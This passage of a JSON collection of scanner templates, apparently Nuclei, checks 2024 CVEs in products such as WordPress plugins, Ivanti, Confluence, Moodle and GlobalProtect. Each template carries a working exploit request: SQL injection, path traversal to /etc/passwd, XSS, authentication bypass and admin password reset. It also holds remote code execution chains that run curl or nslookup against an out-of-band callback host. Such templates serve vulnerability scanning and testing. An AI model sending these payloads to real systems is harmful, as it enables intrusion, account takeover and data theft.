{{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body_1,\"result\",\"success\") && contains_all(body_2,\"PID\",\"USER\",\"VSZ\",\"STAT\",\"COMMAND\")","status_code_1 == 200 && status_code_2 == 200"],"condition":"and"}]}]},{"id":"CVE-2024-2876","info":{"name":"Wordpress Email Subscribers by Icegram Express - SQL Injection","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nPOST /wp-admin/admin-post.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\npage=es_subscribers&is_ajax=1&action=_sent&advanced_filter[conditions][0][0][field]=status=99924)))union(select(sleep(4)))--+&advanced_filter[conditions][0][0][operator]==&advanced_filter[conditions][0][0][value]=1111\n"],"matchers":[{"type":"dsl","dsl":["duration>=4","status_code == 200","contains(header, \"application/json\")","contains_all(body, \"bulk_action\", \"_sent\", \"errortype\")"],"condition":"and"}]}]},{"id":"CVE-2024-32238","info":{"name":"H3C ER8300G2-X - Password Disclosure","severity":"critical"},"requests":[{"raw":["GET /userLogin.asp/../actionpolicy_status/../ER8300G2-X.cfg HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["vtyname","vtypasswd","auxauthmode"],"condition":"and"},{"type":"word","part":"content_type","words":["application/x-unknown"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3822","info":{"name":"Base64 Encoder/Decoder <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/base64-encoderdecoder/base64-decode.php?string=PHNjcmlwdD5hbGVydCgiZG9jdW1lbnQuZG9tYWluIik8L3NjcmlwdD4="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"text/html\")","contains(body, \"<p><script>alert(\\\"document.domain\\\")</script></p>\")"],"condition":"and"}]}]},{"id":"CVE-2024-0337","info":{"name":"Travelpayouts <= 1.1.16 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?travelpayouts_redirect=https://oast.me"],"redirects":true,"max-redirects":2,"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\\-_\\.@]*)oast\\.me.*$"]}]}]},{"id":"CVE-2024-4836","info":{"name":"Edito CMS - Sensitive Data Leak","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"dsl","dsl":["contains_any(body,\"content=\\\"edito\", \"www.edito.pl\")","status_code==200"],"condition":"and","internal":true}]},{"method":"GET","path":["{{BaseURL}}/config.php","{{BaseURL}}/config/config.php","{{BaseURL}}/include/config.php","{{BaseURL}}/includes/config.php"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"db_password\", \"db_username\")","status_code==200"],"condition":"and"}]}]},{"id":"CVE-2024-45241","info":{"name":"CentralSquare CryWolf - Path Traversal","severity":"high"},"requests":[{"raw":["GET /GeneralDocs.aspx?rpt=../../../../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(body,\"Powered by CryWolf\")","status_code == 200"],"condition":"and","internal":true}]},{"raw":["GET /gdoc1.ashx HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\")","contains(content_type,\"application/pdf\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-4295","info":{"name":"Email Subscribers by Icegram Express <= 5.7.20 - Unauthenticated SQL Injection via Hash","severity":"critical"},"requests":[{"raw":["@timeout: 20s\nGET /?es=optin&hash={{ base64(rawhash) }} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["duration>=5","contains(body, \"You have been successfully subscribed\")"],"condition":"and"}]}]},{"id":"CVE-2024-31850","info":{"name":"CData Arc < 23.4.8839 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.rst"],"matchers":[{"type":"word","internal":true,"words":["<title>CData Arc"]}]},{"raw":["GET /ui/..\\src\\getSettings.rsb?@json HTTP/1.1\nHost: {{Hostname}}\nReferer: {{RootURL}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"items\":[{",":\"true\"","notifyemail"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-3742","info":{"name":"Electrolink FM/DAB/TV Transmitter (controlloLogin.js) - Credentials Disclosure","severity":"high"},"requests":[{"raw":["GET /controlloLogin.js HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type, \"application/x-javascript\")","contains(body, \"user==\") && contains(body, \"password==\")","status_code == 200"],"condition":"and"}],"extractors":[{"type":"regex","part":"body","regex":["user\\s*==\\s*'([^']*)'\\s*&&\\s*password\\s*==\\s*'([^']*)'"]}]}]},{"id":"CVE-2024-1380","info":{"name":"Relevanssi (A Better Search) <= 4.22.0 - Query Log Export","severity":"medium"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\naction=&relevanssi_export=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains_all(header, \"filename=relevanssi_log.csv\", \"application/download\")","contains_all(body, \"user_id\", \"session_id\")"],"condition":"and"}]}]},{"id":"CVE-2024-34351","info":{"name":"Next.js - Server Side Request Forgery (SSRF)","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/image?w=16&q=10&url=http://{{interactsh-url}}","{{BaseURL}}/_next/image?w=16&q=10&url=https://{{interactsh-url}}"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"body","words":["The requested resource isn't a valid image"]}]}]},{"id":"CVE-2024-3400","info":{"name":"GlobalProtect - OS Command Injection","severity":"critical"},"requests":[{"raw":["GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n","POST /ssl-vpn/hipreport.esp HTTP/1.1\nHost: {{Hostname}}\nCookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/{{randstr}}.txt;\nContent-Type: application/x-www-form-urlencoded\n\nuser=global&portal=global&authcookie=e51140e4-4ee3-4ced-9373-96160d68&domain=global&computer=global&client-ip=global&client-ipv6=global&md5-sum=global&gwHipReportCheck=global\n","GET /global-protect/portal/images/{{randstr}}.txt HTTP/1.1 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 404 && status_code_3 == 403","contains(body_2, 'invalid required input parameters')"],"condition":"and"}]}]},{"id":"CVE-2024-32640","info":{"name":"Mura/Masa CMS - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nobject=displayregion&contenthistid=x\\'&previewid=1\n"],"matchers":[{"type":"dsl","dsl":["status_code == 500","contains(header, \"application/json\")","contains_all(body, \"Unhandled Exception\")","contains_all(header,\"cfid\",\"cftoken\")"],"condition":"and"}]}]},{"id":"CVE-2024-29824","info":{"name":"Ivanti EPM - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /WSStatusEvents/EventHandler.asmx HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/soap+xml\n\n<?xml version=\"1.0\" encoding=\"utf-8\"?>\n<soap12:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:soap12=\"http://www.w3.org/2003/05/soap-envelope\">\n  <soap12:Body>\n    <UpdateStatusEvents xmlns=\"http://tempuri.org/\">\n      <deviceID>string</deviceID>\n      <actions>\n        <Action name=\"string\" code=\"0\" date=\"0\" type=\"96\" user=\"string\" configguid=\"string\" location=\"string\">\n          <status>GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup {{interactsh-url}}'--</status>\n        </Action>\n      </actions>\n    </UpdateStatusEvents>\n  </soap12:Body>\n</soap12:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"content_type","words":["application/soap+xml"]},{"type":"word","part":"body","words":["UpdateStatusEventsResponse"]},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-6095","info":{"name":"LocalAI - Partial Local File Read","severity":"medium"},"requests":[{"raw":["POST /models/apply HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"url\":\"file:///etc/passwd\"}\n"],"extractors":[{"type":"json","part":"body","name":"uuid","internal":true,"json":[".uuid"]}]},{"raw":["GET /models/jobs/{{uuid}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":[": cannot unmarshal !!str `root:x:...`"]},{"type":"word","part":"content_type","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-27198","info":{"name":"TeamCity < 2023.11.4 - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/hax?jsp=/app/rest/server;.jsp"],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(header, \"application/xml\")","contains_all(body, \"buildNumber\", \"server version\", \"internalId\")"],"condition":"and"}]}]},{"id":"CVE-2024-20419","info":{"name":"Cisco SSM On-Prem <= 8-202206 - Password Reset Account Takeover","severity":"critical"},"requests":[{"raw":["GET /backend/settings/oauth_adfs?hostname=polar HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","words":["enabled","redirect"],"condition":"and","internal":true}]},{"raw":["POST /backend/reset_password/generate_code HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\"}\n"],"matchers":[{"type":"word","words":["uid","auth_token"],"condition":"and","internal":true}],"extractors":[{"type":"json","part":"body","name":"auth_token","json":[".auth_token"],"internal":true}]},{"raw":["POST /backend/reset_password HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nContent-Type: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\n\n{\"uid\": \"admin\",\"auth_token\":\"{{auth_token}}\", \"password\":\"{{password}}\",\"password_confirmation\":\"{{password}}\",\"common_name\":\"\"}\n"],"matchers":[{"type":"word","words":["\"status\":\"OK\""],"condition":"and","internal":true}]},{"raw":["POST /backend/auth/identity/callback HTTP/1.1\nHost: {{Hostname}}\nAccept: application/json\nX-Xsrf-Token: {{urldecode('{{http_1_xsrf-token}}')}}\nContent-Type: application/json\n\n{\"username\":\"{{username}}\",\"password\":\"{{password}}\"}\n"],"matchers":[{"type":"word","part":"body","words":["session_key","role"],"condition":"and"}],"extractors":[{"type":"dsl","dsl":["\"USER: \"+ username","\"PASS: \"+ password"]}]}]},{"id":"CVE-2024-7339","info":{"name":"TVT DVR Sensitive Device - Information Disclosure","severity":"medium"},"requests":[{"raw":["POST /queryDevInfo HTTP/1.1\nHost: {{Hostname}}\n\n<?xml version=\"1.0\" encoding=\"utf-8\" ?><request version=\"1.0\" systemType=\"NVMS-9000\" clientType=\"WEB\"/>\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["softwareVersion","eth0"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-21683","info":{"name":"Atlassian Confluence Data Center and Server - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /dologin.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nos_username={{username}}&os_password={{password}}&login=Log+in&os_destination=\n","POST /doauthenticate.action HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\nX-Atlassian-Token: no-check\n\npassword={{password}}&authenticate=Confirm&destination=%2Fadmin%2Fplugins%2Fnewcode%2Faddlanguage.action\n","POST /admin/plugins/newcode/addlanguage.action HTTP/1.1\nHost: {{Hostname}}\nX-Atlassian-Token: no-check\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryFcBwsDjo5LkYWGWE\n\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"languageFile\";filename=\"{{randstr}}.js\"\nContent-type: text/javascript\n\nnew java.lang.ProcessBuilder[\"(java.lang.String[])\"]([\"curl\",\"{{interactsh-url}}\"]).start()\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE\nContent-Disposition: form-data; name=\"newLanguageName\"\n\n{{randstr}}\n------WebKitFormBoundaryFcBwsDjo5LkYWGWE--\n"],"matchers":[{"type":"dsl","dsl":["status_code_1 == 302 && status_code_2 == 302","contains(interactsh_protocol, 'dns')","contains(body_3, \"confluence\")"],"condition":"and"}]}]},{"id":"CVE-2024-27718","info":{"name":"Smart s200 Management Platform v.S200 - SQL Injection","severity":"high"},"requests":[{"raw":["GET /importexport.php?sql={{base64(cmd)}}&type=exportexcelbysql HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]},{"type":"word","part":"header","words":["application/octet-stream"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-41107","info":{"name":"Apache CloudStack - SAML Signature Exclusion","severity":"critical"},"requests":[{"raw":["POST /client/api?command=samlSso HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nRelayState=undefined&SAMLResponse={{urlencode(base64(saml))}}\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(header,'sessionkey')","contains(content_type,'text/xml')","status_code==302"],"condition":"and"}]}]},{"id":"CVE-2024-43425","info":{"name":"Moodle - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /login/index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /login/index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nanchor=&logintoken={{token}}&username={{username}}&password={{password}}\n"],"host-redirects":true,"extractors":[{"type":"regex","part":"body","name":"token","group":1,"regex":["name=\"logintoken\" value=\"([a-zA-Z0-9]+)\">"],"internal":true}]},{"raw":["GET /my/courses.php HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"sesskey","part":"body","internal":true,"group":1,"regex":["\"sesskey\":\"([^\"]+)\""]}]},{"raw":["POST /lib/ajax/service.php?sesskey={{sesskey}}&info=core_course_get_enrolled_courses_by_timeline_classification HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n[{\"index\":0,\"methodname\":\"core_course_get_enrolled_courses_by_timeline_classification\",\"args\":{\"offset\":0,\"limit\":0,\"classification\":\"all\",\"sort\":\"fullname\",\"customfieldname\":\"\",\"customfieldvalue\":\"\",\"requiredfields\":[\"id\",\"fullname\",\"shortname\",\"showcoursecategory\",\"showshortname\",\"visible\",\"enddate\"]}}]\n"],"extractors":[{"type":"json","part":"body","name":"courseid","json":[".[].data.courses[0].id"],"internal":true}]},{"raw":["POST /question/bank/editquestion/question.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ninitialcategory=1&reload=1&shuffleanswers=1&answernumbering=abc&mform_isexpanded_id_answerhdr=1&noanswers=1&nounits=1&numhints=2&synchronize=&wizard=datasetdefinitions&id=&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&qtype=calculated&makecopy=0&sesskey={{sesskey}}&_qf__qtype_calculated_edit_form=1&mform_isexpanded_id_generalheader=1&mform_isexpanded_id_unithandling=1&mform_isexpanded_id_unithdr=1&mform_isexpanded_id_multitriesheader=1&mform_isexpanded_id_tagsheader=1&category=2%2C11&name=aaaaaaa&questiontext%5Btext%5D=%3Cp%3Edsaszzzzzzzzda%3C%2Fp%3E&questiontext%5Bformat%5D=1&questiontext%5Bitemid%5D=471779994&status=ready&defaultmark=1&generalfeedback%5Btext%5D=&generalfeedback%5Bformat%5D=1&generalfeedback%5Bitemid%5D=318048148&idnumber=&answer%5B0%5D=%281%29-%3E%7Bsystem%28%24_GET%5Bchr%2897%29%5D%29%7D&fraction%5B0%5D=1.0&tolerance%5B0%5D=0.01&tolerancetype%5B0%5D=1&correctanswerlength%5B0%5D=2&correctanswerformat%5B0%5D=1&feedback%5B0%5D%5Btext%5D=&feedback%5B0%5D%5Bformat%5D=1&feedback%5B0%5D%5Bitemid%5D=238751667&unitrole=3&penalty=0.3333333&hint%5B0%5D%5Btext%5D=%3Cp%3Eas%3C%2Fp%3E&hint%5B0%5D%5Bformat%5D=1&hint%5B0%5D%5Bitemid%5D=653998899&hint%5B1%5D%5Btext%5D=&hint%5B1%5D%5Bformat%5D=1&hint%5B1%5D%5Bitemid%5D=161289221&tags=_qf__force_multiselect_submission&submitbutton=Save+changes\n"],"extractors":[{"type":"regex","part":"header","name":"id","group":1,"internal":true,"regex":["&id=([0-9]+)&"]}]},{"raw":["POST /question/bank/editquestion/question.php?wizardnow=datasetdefinitions HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nid={{id}}&inpopup=0&cmid=&courseid={{courseid}}&returnurl=%2Fquestion%2Fedit.php%3Fcourseid%3D2%26deleteall%3D1&mdlscrollto=0&appendqnumstring=&category=2%2C11&wizard=datasetitems&sesskey={{sesskey}}&_qf__question_dataset_dependent_definitions_form=1&dataset%5B0%5D=0&synchronize=0&submitbutton=Next+page\n"],"extractors":[{"type":"regex","part":"header","name":"rceurl","group":1,"internal":true,"regex":["Location: https?://.*?/question/(.*)&returnurl"]}]},{"raw":["GET /question/{{rceurl}}&a=curl%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23163","info":{"name":"GestSup - Account Takeover","severity":"critical"},"requests":[{"raw":["POST /ajax/ticket_user_db.php HTTP/1.1\nHost: {{Hostname}}\nX-Requested-With: xmlhttprequest\nContent-Type: application/x-www-form-urlencoded\n\nmodifyuser=1&lastname={{lastname}}&firstname={{firstname}}&phone=&mobile=&mail={{email}}&company=111&id=1\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["{\"status\":\"success","firstname\":\"{{firstname}}\",\"lastname\":\"{{lastname}}"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]}],"extractors":[{"type":"dsl","dsl":["\"Firstname: \"+ firstname","\"Lastname: \"+ lastname"]}]}]},{"id":"CVE-2024-4358","info":{"name":"Progress Telerik Report Server - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /Startup/Register HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nUsername={{user}}&Password={{pass}}&ConfirmPassword={{pass}}&Email={{email}}&FirstName={{firstname}}&LastName={{lastname}}\n","POST /Token HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ngrant_type=password&username={{user}}&password={{pass}}\n"],"matchers":[{"type":"dsl","dsl":["contains(content_type_2, \"application/json\")","contains_all(body_2, \"access_token\", \"userName\", \"token_type\")","status_code_2 == 200"],"condition":"and"}],"extractors":[{"type":"regex","name":"token","part":"body_2","group":1,"regex":["\"access_token\":\"([A-Z0-9a-z_-]+)\""],"internal":true},{"type":"dsl","dsl":["\"Username: \"+ user","\"Password: \"+ pass"]}]}]},{"id":"CVE-2024-22024","info":{"name":"Ivanti Connect Secure - XXE","severity":"high"},"requests":[{"raw":["POST /dana-na/auth/saml-sso.cgi HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nSAMLRequest={{base64(payload)}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["/dana-na/","WriteCSS"],"condition":"and"}]}]},{"id":"CVE-2024-5315","info":{"name":"Dolibarr ERP CMS `list.php` - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /htdocs/index.php?mainmenu=home HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nloginfunction=loginfunction&username={{username}}&password={{password}}\n","GET /htdocs/commande/list.php?viewstatut=x%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body_2","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header_1","words":["Set-Cookie: DOLSESSID_"]},{"type":"word","part":"body_1","words":["SuperAdmin"]}]}]},{"id":"CVE-2024-4348","info":{"name":"osCommerce v4.0 - Cross-site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/furniture/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1","{{BaseURL}}/watch/catalog/all-products?cat=1&bhl4n%2522%253e%253cScRiPt%253ealert%2528'document_domain'%2529%253c%252fScRiPt%253eiyehb=1"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<ScRiPt>alert('document_domain')</ScRiPt>","Listing of all products on the site"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7340","info":{"name":"W&B Weave Server - Remote Arbitrary File Leak","severity":"high"},"requests":[{"raw":["GET /__weave/file/tmp/weave/fs/../../../etc/passwd HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["application/octet-stream","filename=passwd"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7008","info":{"name":"Calibre <= 7.15.0 - Reflected Cross-Site Scripting (XSS)","severity":"medium"},"requests":[{"raw":["GET /browse/book/TEST&quot;;window.stop();alert(document.domain);%2f%2f HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["window.location.href = \"/#book_id=TEST\";window.stop();alert(document.domain);//&panel=book_details"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-29059","info":{"name":".NET Framework - Leaking ObjRefs via HTTP .NET Remoting","severity":"high"},"requests":[{"raw":["GET /RemoteApplicationMetadata.rem?wsdl HTTP/1.1\nHost: {{Hostname}}\n__RequestVerb: POST\nContent-Type: text/xml\n","POST {{objref}} HTTP/1.1\nHost: {{Hostname}}\nSOAPAction: \"\"\nContent-Type: text/xml\n\n<SOAP-ENV:Envelope xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\" xmlns:xsd=\"http://www.w3.org/2001/XMLSchema\" xmlns:SOAP-ENC=\"http://schemas.xmlsoap.org/soap/encoding/\" xmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\" xmlns:clr=\"http://schemas.microsoft.com/soap/encoding/clr/1.0\" SOAP-ENV:encodingStyle=\"http://schemas.xmlsoap.org/soap/encoding/\">\n<a1:TextFormattingRunProperties id=\"ref-1\" xmlns:a1=\"http://schemas.microsoft.com/clr/nsassem/Microsoft.VisualStudio.Text.Formatting/Microsoft.PowerShell.Editor%2C%20Version%3D3.0.0.0%2C%20Culture%3Dneutral%2C%20PublicKeyToken%3D31bf3856ad364e35\">\n<ForegroundBrush id=\"ref-3\">&#60;ObjectDataProvider MethodName=&#34;AddHeader&#34;\n  xmlns=&#34;http://schemas.microsoft.com/winfx/2006/xaml/presentation&#34;\n  xmlns:x=&#34;http://schemas.microsoft.com/winfx/2006/xaml&#34;\n  xmlns:System=&#34;clr-namespace:System;assembly=mscorlib&#34;\n  xmlns:System.Web=&#34;clr-namespace:System.Web;assembly=System.Web&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;&#60;ObjectDataProvider MethodName=&#34;get_Response&#34;&#62;&#60;ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider ObjectType=&#34;{x:Type System.Web:HttpContext}&#34; MethodName=&#34;get_Current&#34; /&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;/ObjectDataProvider&#62;\n  &#60;/ObjectDataProvider.ObjectInstance&#62;\n  &#60;ObjectDataProvider.MethodParameters&#62;\n  &#60;System:String&#62;X-Vuln-Test&#60;/System:String&#62;\n  &#60;System:String&#62;{{randstr}}&#60;/System:String&#62;\n  &#60;/ObjectDataProvider.MethodParameters&#62;\n&#60;/ObjectDataProvider&#62;</ForegroundBrush>\n</a1:TextFormattingRunProperties>\n</SOAP-ENV:Envelope>\n"],"extractors":[{"type":"regex","name":"objref","part":"body_1","group":1,"regex":["(/[0-9a-f_]+/[0-9A-Za-z_+]+_[0-9]+\\.rem)"],"internal":true},{"type":"dsl","dsl":["x_vuln_test"]}],"matchers":[{"type":"dsl","dsl":["contains(body_1,'ObjRef')","contains(x_vuln_test,'{{randstr}}')"],"condition":"and"}]}]},{"id":"CVE-2024-1728","info":{"name":"Gradio > 4.19.1 UploadButton - Path Traversal","severity":"high"},"requests":[{"raw":["POST /queue/join? HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\"data\":[[{\"path\":\"{{path}}\",\"url\":\"{{BaseURL}}/file=/help\",\"orig_name\":\"CHANGELOG.md\",\"size\":3549,\"mime_type\":\"text/markdown\"}]],\"event_data\":null,\"fn_index\":0,\"trigger_id\":2,\"session_hash\":\"{{randstr}}\"}\n","GET /queue/data?session_hash={{randstr}} HTTP/1.1\nHost: {{Hostname}}\n","GET /file={{extracted_path}} HTTP/1.1\nHost: {{Hostname}}\n"],"extractors":[{"type":"regex","name":"extracted_path","regex":["/tmp/gradio/.*/passwd","C:.*\\win\\.ini"],"internal":true}],"payloads":{"path":["/etc/passwd","/windows/win.ini"]},"stop-at-first-match":true,"matchers":[{"type":"dsl","dsl":["contains_all(body,\"bit app support\",\"fonts\",\"extensions\") || regex(\"root:.*:0:0:\", body)","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2024-0881","info":{"name":"Combo Blocks < 2.2.76 - Improper Access Control","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/user-meta/readme.txt"],"matchers":[{"type":"word","internal":true,"words":["User Profile Builder"]}]},{"method":"GET","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_paginate_ajax_free","{{BaseURL}}/wp-admin/admin-ajax.php?action=post_grid_ajax_search_free"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["{\"html\"","\"<div class=","\"pagination\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-23334","info":{"name":"aiohttp - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/static/../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"word","part":"header","words":["aiohttp","application/octet-stream"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-37843","info":{"name":"Craft CMS <=v3.7.31 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /api/ HTTP/1.1\nHost: {{Hostname}}\nContent-Type:application/json\n\n{\"query\":\"query  IntrospectionQuery  {assets(orderBy: \\\"`assets`.`volumeId`,extractvalue(1,concat(0x0a,concat('{{matcher}}',version()))) --\\\", limit: 5){filename}}\"}\n"],"skip-variables-check":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["General error: 1105 XPATH syntax error: '\\n{{matcher}}"]},{"type":"word","part":"content_type","words":["application/json"]}]}]},{"id":"CVE-2024-36991","info":{"name":"Splunk Enterprise - Local File Inclusion","severity":"high"},"requests":[{"raw":["GET /en-US/login HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"Splunk Inc.\")"],"condition":"and","internal":true}]},{"raw":["GET /en-US/modules/messaging/C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../C:../Windows/win.ini HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2024-0204","info":{"name":"Fortra GoAnywhere MFT - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/goanywhere/images/..;/wizard/InitialAccountSetup.xhtml"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Create an administrator account","goanywhere"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-0235","info":{"name":"EventON (Free < 2.2.8, Premium < 4.5.5) - Information Disclosure","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin-ajax.php?action=eventon_get_virtual_users"],"headers":{"Content-Type":"application/x-www-form-urlencoded"},"body":"_user_role=administrator","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["@","status\":\"good","value=","\"content\":"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2024-7593","info":{"name":"Ivanti vTM - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /apps/zxtm/wizard.fcgi?error=1&section=Access+Management%3ALocalUsers HTTP/1.1\nHost: 